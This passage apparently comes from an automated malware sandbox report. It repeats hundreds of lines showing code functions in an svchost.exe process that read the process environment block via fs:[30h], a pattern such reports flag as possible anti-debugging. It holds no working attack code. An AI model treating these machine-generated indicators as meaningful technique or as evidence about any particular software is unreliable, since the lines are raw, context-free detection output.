            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03087190 mov eax, dword ptr fs:[00000030h]1_2_03087190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]1_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]1_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]1_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]1_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304B1B0 mov eax, dword ptr fs:[00000030h]1_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306D1D0 mov eax, dword ptr fs:[00000030h]1_2_0306D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306D1D0 mov ecx, dword ptr fs:[00000030h]1_2_0306D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031051CB mov eax, dword ptr fs:[00000030h]1_2_031051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030351ED mov eax, dword ptr fs:[00000030h]1_2_030351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]1_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]1_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]1_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]1_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]1_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]1_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]1_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]1_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]1_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D705E mov ebx, dword ptr fs:[00000030h]1_2_030D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D705E mov eax, dword ptr fs:[00000030h]1_2_030D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B052 mov eax, dword ptr fs:[00000030h]1_2_0305B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03105060 mov eax, dword ptr fs:[00000030h]1_2_03105060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov ecx, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]1_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD070 mov ecx, dword ptr fs:[00000030h]1_2_030AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]1_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D08D mov eax, dword ptr fs:[00000030h]1_2_0302D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03035096 mov eax, dword ptr fs:[00000030h]1_2_03035096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D090 mov eax, dword ptr fs:[00000030h]1_2_0305D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D090 mov eax, dword ptr fs:[00000030h]1_2_0305D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306909C mov eax, dword ptr fs:[00000030h]1_2_0306909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031050D9 mov eax, dword ptr fs:[00000030h]1_2_031050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD0C0 mov eax, dword ptr fs:[00000030h]1_2_030AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD0C0 mov eax, dword ptr fs:[00000030h]1_2_030AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]1_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030590DB mov eax, dword ptr fs:[00000030h]1_2_030590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030550E4 mov eax, dword ptr fs:[00000030h]1_2_030550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030550E4 mov ecx, dword ptr fs:[00000030h]1_2_030550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]1_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]1_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]1_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03037703 mov eax, dword ptr fs:[00000030h]1_2_03037703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03035702 mov eax, dword ptr fs:[00000030h]1_2_03035702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03035702 mov eax, dword ptr fs:[00000030h]1_2_03035702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]1_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]1_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]1_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306F71F mov eax, dword ptr fs:[00000030h]1_2_0306F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306F71F mov eax, dword ptr fs:[00000030h]1_2_0306F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF72E mov eax, dword ptr fs:[00000030h]1_2_030EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03033720 mov eax, dword ptr fs:[00000030h]1_2_03033720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304F720 mov eax, dword ptr fs:[00000030h]1_2_0304F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304F720 mov eax, dword ptr fs:[00000030h]1_2_0304F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304F720 mov eax, dword ptr fs:[00000030h]1_2_0304F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F972B mov eax, dword ptr fs:[00000030h]1_2_030F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310B73C mov eax, dword ptr fs:[00000030h]1_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310B73C mov eax, dword ptr fs:[00000030h]1_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310B73C mov eax, dword ptr fs:[00000030h]1_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310B73C mov eax, dword ptr fs:[00000030h]1_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029730 mov eax, dword ptr fs:[00000030h]1_2_03029730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029730 mov eax, dword ptr fs:[00000030h]1_2_03029730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03065734 mov eax, dword ptr fs:[00000030h]1_2_03065734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303973A mov eax, dword ptr fs:[00000030h]1_2_0303973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303973A mov eax, dword ptr fs:[00000030h]1_2_0303973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]1_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03043740 mov eax, dword ptr fs:[00000030h]1_2_03043740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03043740 mov eax, dword ptr fs:[00000030h]1_2_03043740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03043740 mov eax, dword ptr fs:[00000030h]1_2_03043740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]1_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03103749 mov eax, dword ptr fs:[00000030h]1_2_03103749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]1_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B765 mov eax, dword ptr fs:[00000030h]1_2_0302B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B765 mov eax, dword ptr fs:[00000030h]1_2_0302B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B765 mov eax, dword ptr fs:[00000030h]1_2_0302B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B765 mov eax, dword ptr fs:[00000030h]1_2_0302B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]1_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF78A mov eax, dword ptr fs:[00000030h]1_2_030EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B97A9 mov eax, dword ptr fs:[00000030h]1_2_030B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BF7AF mov eax, dword ptr fs:[00000030h]1_2_030BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BF7AF mov eax, dword ptr fs:[00000030h]1_2_030BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BF7AF mov eax, dword ptr fs:[00000030h]1_2_030BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BF7AF mov eax, dword ptr fs:[00000030h]1_2_030BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BF7AF mov eax, dword ptr fs:[00000030h]1_2_030BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031037B6 mov eax, dword ptr fs:[00000030h]1_2_031037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]1_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D7B0 mov eax, dword ptr fs:[00000030h]1_2_0305D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]1_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]1_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]1_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]1_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]1_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]1_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]1_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]1_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F7BA mov eax, dword ptr fs:[00000030h]1_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]1_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030357C0 mov eax, dword ptr fs:[00000030h]1_2_030357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030357C0 mov eax, dword ptr fs:[00000030h]1_2_030357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030357C0 mov eax, dword ptr fs:[00000030h]1_2_030357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303D7E0 mov ecx, dword ptr fs:[00000030h]1_2_0303D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03061607 mov eax, dword ptr fs:[00000030h]1_2_03061607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]1_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306F603 mov eax, dword ptr fs:[00000030h]1_2_0306F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03033616 mov eax, dword ptr fs:[00000030h]1_2_03033616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03033616 mov eax, dword ptr fs:[00000030h]1_2_03033616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]1_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]1_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]1_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]1_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]1_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]1_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]1_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]1_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]1_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]1_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F626 mov eax, dword ptr fs:[00000030h]1_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]1_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03105636 mov eax, dword ptr fs:[00000030h]1_2_03105636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]1_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]1_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]1_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03069660 mov eax, dword ptr fs:[00000030h]1_2_03069660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03069660 mov eax, dword ptr fs:[00000030h]1_2_03069660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]1_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B368C mov eax, dword ptr fs:[00000030h]1_2_030B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B368C mov eax, dword ptr fs:[00000030h]1_2_030B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B368C mov eax, dword ptr fs:[00000030h]1_2_030B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B368C mov eax, dword ptr fs:[00000030h]1_2_030B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
